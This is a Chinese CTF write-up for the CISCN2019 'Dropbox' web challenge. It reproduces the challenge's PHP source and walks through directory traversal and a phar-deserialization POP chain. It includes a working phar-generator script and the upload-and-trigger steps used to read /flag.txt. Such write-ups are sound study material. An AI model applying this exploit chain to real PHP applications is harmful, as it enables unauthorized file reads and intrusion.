[CISCN2019 华北赛区 Day1 Web1]Dropbox
目录穿越下载
注册、登录,发现可文件上传。上传文件后发现可以下载或者删除,尝试上传php马但是发现都被过滤,抓包下载的选项。发现下载可能存在目录穿越。于是尝试../../index.php
,发现可成功下载。于是将download.php
delete.php
下载,审源码可知还有一个class.php
代码审计
写这篇我也是到处抄抄,明白的地方就吸过来,现在开始看着源码分析。
index.php
#index.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
?>
<!DOCTYPE html>
<html>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>网盘管理</title>
<head>
<link href="static/css/bootstrap.min.css" rel="stylesheet">
<link href="static/css/panel.css" rel="stylesheet">
<script src="static/js/jquery.min.js"></script>
<script src="static/js/bootstrap.bundle.min.js"></script>
<script src="static/js/toast.js"></script>
<script src="static/js/panel.js"></script>
</head>
<body>
<nav aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item active">管理面板</li>
<li class="breadcrumb-item active"><label for="fileInput" class="fileLabel">上传文件</label></li>
<li class="active ml-auto"><a href="#">你好 <?php echo $_SESSION['username']?></a></li>
</ol>
</nav>
<input type="file" id="fileInput" class="hidden">
<div class="top" id="toast-container"></div>
<?php
include "class.php";
$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>
download.php
ini_set("open_basedir", getcwd() . ":/etc:/tmp");
限定只可以访问当前目录、/etc、/tmp三个目录
$file->close()
存在可phar反序列化的地方,因为这里会引用到class.php中的File类中close方法的file_get_contents
但是因为限定了访问目录只能是当前目录、/etc、/tmp三个目录,所以dwonload.php是不行的
具体前置知识看这[CISCN2019 华北赛区 Day1 Web1]Dropbox-CSDN博客
#download.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=" . basename($filename));
echo $file->close();
} else {
echo "File not exist";
}
?>
delete.php
$file->open可以触发到File类的open函数,而刚刚好里面有file_exists函数可以触发phar反序列化
#delete.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
$file->detele();
Header("Content-type: application/json");
$response = array("success" => true, "error" => "");
echo json_encode($response);
} else {
Header("Content-type: application/json");
$response = array("success" => false, "error" => "File not exist");
echo json_encode($response);
}
?>
class.php
整个下来最值得我感觉最值得了解清楚的是这里
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) { #file就是每个我们上传文件的File对象
$this->results[$file->name()][$func] = $file->$func();
}
}
_call方法是在调用类中没有的方法时才会触发的魔术方法。
在index.php中,我们可以看到含有以下字段
<?php
include "class.php";
$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>
结合Filelist类中的:
foreach ($filenames as $filename) {
$file = new File();
$file->open($path . $filename);# $file = true or false
array_push($this->files, $file);# 把File对象加入到files数组
$this->results[$file->name()] = array(); #results 是个数组,保存以我们上传的文件名作为键值,每个文件名键值映射一个数组
}
从上面这几个结合起来,我们可以看出来。整个调用的过程是实例一个Filelist类并且调用Name()、Size()方法。但是Filelist类没有,所以_call方法被触发。而 _call方法会调用到所需的方法(从File类中),并且将结果存放在二维数组results中,这个二维数组具体长这样子
Name | Size | |
---|---|---|
filename1 | ||
filename2 |
粗略的了解了大概,我们再详细讲讲里面整个_call()的整个过程,首先 _ call()函数会在调用类中不存在方法后被调用。$func是 _ call自动读的形参,即不存在的方法,$args为调用方法中的参数。 array_push($this->funcs, $func);
是将读到的$func压进去这个类中原本存在的funcs数组。而后面foreach的内容,就是完善这二维数组的作用。
#class.php
<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
public $db;
public function __construct() {
global $db;
$this->db = $db;
}
public function user_exist($username) {
$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->store_result();
$count = $stmt->num_rows;
if ($count === 0) {
return false;
}
return true;
}
public function add_user($username, $password) {
if ($this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
return true;
}
public function verify_user($username, $password) {
if (!$this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->bind_result($expect);
$stmt->fetch();
if (isset($expect) && $expect === $password) {
return true;
}
return false;
}
public function __destruct() {
$this->db->close();
}
}
class FileList {
private $files;#files[File对象]
private $results;#resules[filename][function]存function方法执行后的结果
private $funcs;#funciton
public function __construct($path) {
$this->files = array();
$this->results = array();
$this->funcs = array();
$filenames = scandir($path);
$key = array_search(".", $filenames);
unset($filenames[$key]);
$key = array_search("..", $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {
$file = new File();
$file->open($path . $filename);# $file = true or false
array_push($this->files, $file);# 把File对象加入到files数组
$this->results[$file->name()] = array(); #results 是个数组,保存以我们上传的文件名作为键值,每个文件名键值映射一个数组
}
}
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) { #file就是每个我们上传文件的File对象
$this->results[$file->name()][$func] = $file->$func();
}
}
public function __destruct() {
$table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
$table .= '<thead><tr>';
foreach ($this->funcs as $func) {
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
}
$table .= '<th scope="col" class="text-center">Opt</th>';
$table .= '</thead><tbody>';
foreach ($this->results as $filename => $result) {
$table .= '<tr>';
foreach ($result as $func => $value) {
$table .= '<td class="text-center">' . htmlentities($value) . '</td>';
}
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
$table .= '</tr>';
}
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
public function name() {
return basename($this->filename);
}
public function size() {
$size = filesize($this->filename);
$units = array(' B', ' KB', ' MB', ' GB', ' TB');
for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
return round($size, 2).$units[$i];
}
public function detele() {
unlink($this->filename);
}
public function close() {
return file_get_contents($this->filename);
}
}
?>
pop链构造
这个时候我知道铁定要通过 file_get_contents来解决方法的,但是还是太难理解怎么将一串连在一起,看了一篇wp中动调的方法解决让我豁然开朗。[CISCN2019 华北赛区 Day1 Web1]Dropbox复现 - TJ_WaTer - 博客园 (cnblogs.com)
1.从delete.php开始
2.进入$file->open,触发file_exists(此时的$filename=phar://test.phar)
3.而对于file_exists,当他接触到phar时已经进行了反序列化
4.delete.php中的行为结束,但是还没结束,此时因为phar的反序列化触发了类的实例化,这时候需要析构函数回收。
public function __destruct() {
$this->db->close();
}
5.这时候可以用db=FileList()来触发FileList中的_call()
6._call()接收到参数后调用了File类中的close来处理
7.这时候让File类中的$filename为‘/flag.txt’来完成文件包含的最后一环
构造代码
拿了这位师傅的wp来打,自己写的不知道为什么死活上传后不显示有东西存在T_T
[CISCN2019 华北赛区 Day1 Web1]Dropbox_uncaught exception 'unexpectedvalueexception' with-CSDN博客
<?php
class User {
public $db;
}
class FileList {
private $files;
public function __construct()
{
$this->files = array(new File());
}
}
class File {
public $filename = '/flag.txt';
}
$a = new User();
$a->db = new FileList();
@unlink('test.phar');
$phar=new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata($a);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
?>
老生常谈事项:phpini中修改为phar.readonly = Off
并且去掉;
符号才能生成phar文件。
最终payload
上传test.phar,抓包修改为jpg,文件类型改为image/jpeg。
下载时抓包,将filename改为phar://test.jpg(有这个标志头才能触发phar反序列化)
标签:例题,File,phar,filename,file,序列化,public,php From: https://www.cnblogs.com/ethereal258/p/18226588